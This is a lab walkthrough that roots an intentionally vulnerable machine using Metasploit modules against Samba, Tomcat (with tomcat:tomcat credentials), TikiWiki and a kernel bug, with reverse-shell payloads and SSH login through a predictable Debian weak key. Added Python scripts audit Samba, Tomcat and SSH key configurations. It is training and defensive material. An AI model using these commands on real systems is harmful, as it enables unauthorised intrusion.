For the attacking machine, I will be using Kali 2017.1. Once booted, this is what the victim machine will look like:

We start the attack by finding the IP of the victim machine by using the netdiscover command:

$ netdiscover

Now that we know our target IP, let’s start by scanning its ports and trying to get more information about it:

The scan shows us that the following ports are open:

Port 21 – Running FTP
Port 22 – Running OpenSSH
Port 23 – Running Telnet
Port 25 – Running SMTP
Port 80 – Running Apache Web server
Port 139 – Running Samba
Port 445 – Running Samba
Port 3306 – Running MySQL
Port 5432 – Running PostgreSQL
Port 8009 – Running Apache Jserv
Port 8180 – Running Apache Tomcat

Upon visiting the web application (on port 80 via http://) we just see a default Test Page:

Looking at the source code does not reveal anything either. Looking back at the scan results, one particular port catches my eye: port 445, running Samba 3.0.20. Doing some basic research, I found a vulnerability (CVE-2007-2447): http://www.cvedetails.com/cve/cve-2007-2447. Let’s fire up Metasploit and see if that works:

$ use exploit/multi/samba/usermap_script
$ set PAYLOAD cmd/unix/reverse_netcat
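As an added defensive counterpart to the Samba step above (an example written for this page, not code from the original walkthrough or from the Samba project): the usermap_script module only works when a Samba release in the affected range (3.0.0 through 3.0.25rc3, per the CVE description) runs with the "username map script" directive set, so the check a defender wants is whether smb.conf contains that directive, combined with the installed version. The two smb.conf documents inside the script are constructed samples, the first with the risky directive and the second replacing it with the static "username map" file, which is a different option and not the one the CVE concerns.

```python
"""Audit smb.conf for the directive that CVE-2007-2447 depends on.

Added defensive example, not part of the original walkthrough. Both
configurations below are constructed samples.
"""
import re

# Constructed: a [global] section with the risky directive.
WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba %v)
   ; maps incoming user names via an external script (the risky option)
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
   writable = yes
"""

# Constructed: the same host after replacing the script with a static map file.
HARDENED_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba %v)
   username map = /etc/samba/smbusers
[tmp]
   path = /tmp
   writable = yes
"""


def parse_smb_conf(text):
    """Minimal INI-style parser: {section: {option: value}}, names lower-cased."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":          # blank or comment line
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def audit_username_map_script(text):
    """Return one finding per section that sets 'username map script'."""
    findings = []
    for name, opts in parse_smb_conf(text).items():
        script = opts.get("username map script")
        if script:
            findings.append(f"[{name}] username map script = {script}")
    return findings


def version_affected(version):
    """True for Samba 3.0.0 through 3.0.25rc3; a release candidate sorts below its final."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(rc\d+)?", version)
    if not m:
        raise ValueError(f"unrecognised Samba version: {version!r}")
    key = (int(m[1]), int(m[2]), int(m[3]), 0 if m[4] else 1)
    return (3, 0, 0, 0) <= key < (3, 0, 25, 1)


def assess(version, smb_conf_text):
    """Combine the version check and the config check into one verdict string."""
    findings = audit_username_map_script(smb_conf_text)
    if not findings:
        return "clean: no 'username map script' directive"
    detail = "; ".join(findings)
    if version_affected(version):
        return "vulnerable: " + detail
    return "directive present but version outside the affected range: " + detail


if __name__ == "__main__":
    print(assess("3.0.20", WEAK_SMB_CONF))      # the version the scan reported
    print(assess("3.0.25", WEAK_SMB_CONF))
    print(assess("3.0.20", HARDENED_SMB_CONF))
```

The verdict deliberately separates "directive present" from "vulnerable": on a patched Samba the directive is still worth reviewing, since it hands user-controlled input to a shell script, but it is no longer this CVE.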

And we are root! Since this took no time at all, I decided to see how many more ways I could find to exploit this machine. The next thing that caught my eye while looking back at the scan was port 8180, running Tomcat. Checking that in the browser, this is what I found:

While doing some light reading, I came across the following link, https://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_deploy, and thought of giving it a try:

$ use exploit/multi/http/tomcat_mgr_deploy
$ set PAYLOAD java/meterpreter/reverse_tcp
$ set httpusername tomcat
$ set httppassword tomcat
$ set target 0
$ set RPORT 8180

We did get a low-privilege shell. Let’s see how we can escalate our privileges! While looking around, I saw that the kernel is vulnerable to the following exploit: https://www.rapid7.com/db/modules/exploit/linux/local/udev_netlink. Let’s give it a shot:

$ use exploit/linux/local/udev_netlink

And we get root!

Note: Since the default credentials are tomcat:tomcat, you can log in at http://172.16.92.139:8180/admin and play around a bit as well.

Next, I thought of playing around with PostgreSQL. I tried to run a scan, and it came up with a username and password:

$ use auxiliary/scanner/postgres/postgres_login
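As an added defensive counterpart to the Tomcat step (an example written for this page, not code from the original walkthrough or from the Tomcat project): the deploy exploit above needed nothing more than the tomcat:tomcat pair holding a manager role, so the check on the defender's side is to audit tomcat-users.xml for accounts with default or weak passwords and report which privileged roles they hold. Both XML documents in the script are constructed samples; the role names are the Tomcat 5/6 set (manager, admin) and the Tomcat 7+ set (manager-*, admin-*), and the 12-character minimum is a policy chosen for this script.

```python
"""Audit tomcat-users.xml for default or weak credentials on privileged roles.

Added defensive example, not part of the original walkthrough. Both XML
documents below are constructed samples.
"""
import xml.etree.ElementTree as ET

PRIVILEGED_ROLES = {
    "manager", "admin",                               # Tomcat 5.x / 6.x webapps
    "manager-gui", "manager-script", "manager-jmx",   # Tomcat 7+ manager roles
    "manager-status", "admin-gui", "admin-script",
}
KNOWN_DEFAULT_CREDS = {("tomcat", "tomcat")}          # the pair the walkthrough used
MIN_PASSWORD_LEN = 12                                 # this script's own policy

# Constructed: Tomcat 5.5-style file with sample accounts left in place.
WEAK_TOMCAT_USERS = """\
<tomcat-users>
  <role rolename="tomcat"/>
  <role rolename="manager"/>
  <role rolename="admin"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager,admin"/>
  <user username="both" password="both" roles="tomcat"/>
  <user username="deploy" password="Fz9kq2LwV8Np3xQr" roles="manager"/>
</tomcat-users>
"""

# Constructed: Tomcat 7+-style file (namespaced) with the sample accounts removed.
HARDENED_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-script"/>
  <user username="ci-deploy" password="Fz9kq2LwV8Np3xQr" roles="manager-script"/>
</tomcat-users>
"""


def _local(tag):
    """Strip an XML namespace so Tomcat 7+ files (xmlns=...) parse like older ones."""
    return tag.rsplit("}", 1)[-1]


def find_weak_tomcat_users(xml_text):
    """Return a list of findings: the account, why its password is weak, and the
    privileged roles it holds. An empty list means nothing to report."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username") or el.get("name") or ""   # 'name' is the older attribute
        password = el.get("password") or ""
        roles = {r.strip() for r in (el.get("roles") or "").split(",") if r.strip()}
        reasons = []
        if (name, password) in KNOWN_DEFAULT_CREDS:
            reasons.append("well-known default credential")
        elif password == name:
            reasons.append("password equals username")
        elif len(password) < MIN_PASSWORD_LEN:
            reasons.append(f"password shorter than {MIN_PASSWORD_LEN} characters")
        if reasons:
            findings.append({
                "username": name,
                "reasons": reasons,
                "privileged_roles": sorted(roles & PRIVILEGED_ROLES),
            })
    return findings


if __name__ == "__main__":
    for finding in find_weak_tomcat_users(WEAK_TOMCAT_USERS):
        print(finding)
    print(find_weak_tomcat_users(HARDENED_TOMCAT_USERS))
```

Accounts that hold no privileged role are still reported, because a weak password on a plain "tomcat" role is the account an operator is most likely to promote later without revisiting the password.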

Moving on, I wanted to do something with the web app. So, I bring out my old friend dirbuster to reveal its secrets:

TWiki looks interesting. Going to the browser it shows:

Let’s see if Metasploit has anything on it:

Let’s start with this:

We are getting somewhere. Now let’s try a remote PHP code execution exploit we saw earlier:

$ use exploit/unix/webapp/tikiwiki_graph_formula_exec

We do get a limited shell. However, it took a few attempts before the shell was spawned. Checking its root directory shows us:

Let’s see what ssh has:

Let’s ssh with these credentials.

Note: You’ll need to download the following keys in order to search: https://hdm.io/tools/debian-openssl/ (2048-bit RSA). In the folder, let’s search for the key:

$ grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w

And now, time to get in!!

$ ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@172.16.92.139
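As an added defensive counterpart to the weak-key search above (an example written for this page, not code from the original walkthrough or from the hdm.io tool set): because the Debian OpenSSL PRNG bug made every affected key enumerable, the same lookup that finds the private key for a given public key can be run in reverse by a defender over each key that grants login, comparing OpenSSH-style SHA256 fingerprints against a set built from the known-weak keys. The authorized_keys text and the weak-key set in the script are constructed samples: the weak blob is the ssh-rsa public key quoted in the grep above, which the page shows without its trailing "==" padding (the script pads it before decoding), and the ed25519 blob is made up.

```python
"""Check an authorized_keys file against a set of known-weak public keys.

Added defensive example, not part of the original walkthrough. The
authorized_keys content and the weak-key set are constructed samples.
"""
import base64
import hashlib

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")

# The ssh-rsa blob from the grep above; the page dropped its trailing '==' padding.
WEAK_RSA_BLOB = (
    "AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lS"
    "hHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qO"
    "ffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/T"
    "w7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+"
    "kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4"
    "WocyVxsXovcNnbALTp3w"
)

# Constructed: an ed25519-shaped blob that is not a real key and not in the weak set.
CLEAN_ED25519_BLOB = "AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEkeyNOTinTHEweakSETAAAAAAAAAAAAAAAAAAAAAA"


def fingerprint(blob_b64):
    """OpenSSH-style 'SHA256:<base64>' fingerprint of a base64 public-key blob.
    The blob is re-padded first, because copied keys often lose their '='."""
    padded = blob_b64 + "=" * (-len(blob_b64) % 4)
    digest = hashlib.sha256(base64.b64decode(padded)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Yield (key_type, blob, comment) per key line, skipping blanks, comments
    and any leading options such as from="..." or command="..."."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        idx = next((i for i, tok in enumerate(parts) if tok.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(parts):
            continue                      # no key type, or type without a blob
        yield parts[idx], parts[idx + 1], " ".join(parts[idx + 2:])


# Constructed: a weak-key set reduced to fingerprints (the published list would be larger).
WEAK_FINGERPRINTS = {fingerprint(WEAK_RSA_BLOB)}

# Constructed authorized_keys: one weak key, one clean key carrying a restriction option.
AUTHORIZED_KEYS = (
    "# root's authorized_keys (constructed sample)\n"
    "ssh-rsa " + WEAK_RSA_BLOB + " root@metasploitable\n"
    'from="10.0.0.0/8" ssh-ed25519 ' + CLEAN_ED25519_BLOB + " ops@bastion\n"
)


def find_weak_keys(authorized_keys_text, weak_fingerprints):
    """Return (key_type, fingerprint, comment) for every key found in the weak set."""
    hits = []
    for key_type, blob, comment in parse_authorized_keys(authorized_keys_text):
        fp = fingerprint(blob)
        if fp in weak_fingerprints:
            hits.append((key_type, fp, comment))
    return hits


if __name__ == "__main__":
    for key_type, fp, comment in find_weak_keys(AUTHORIZED_KEYS, WEAK_FINGERPRINTS):
        print(f"REVOKE {key_type} {fp} ({comment})")
```

The script only reads the file, so it can be pointed at a real authorized_keys once WEAK_FINGERPRINTS holds fingerprints of the full published key set; any key it lists should be removed and replaced, since the matching private key is public.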

And we are root!